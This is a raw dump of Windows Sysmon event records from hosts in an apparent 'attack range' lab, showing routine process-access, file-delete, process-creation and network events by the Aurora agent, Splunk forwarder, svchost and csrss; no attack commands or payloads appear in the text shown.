Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.705{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.694{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000046358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.566{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4F6034E0C22FA8D6A6904B62859419D,SHA256=687600E3E7DB1E67F2EE951BA1977AD22B7D09B67E091EBAB13E7EAA1E33183C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018614Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.997{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50185-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000018613Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E62E-63C7-3B02-00000000B002}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018612Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018611Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018610Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018609Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018608Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018607Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018606Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018605Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018604Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E62E-63C7-3B02-00000000B002}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018602Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.058{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E62E-63C7-3B02-00000000B002}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018601Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.060{E5A8D418-E62E-63C7-3B02-00000000B002}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000046357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.177{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.175{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000046390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:35.765{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=308BD3A148922383F8E7E48BC7EA6761,SHA256=4BDBEBEDC77D8305B79F0E31C6496343B34EF44D86C994C5AF849C0B28A99A5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018615Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:34.997{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08AE47645FBAB7E687418D62D0B5A835,SHA256=F9F690E9852A90601F38FE7484F5337EE9A92DB1B775467C44E475F630B742AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.186{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56464-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 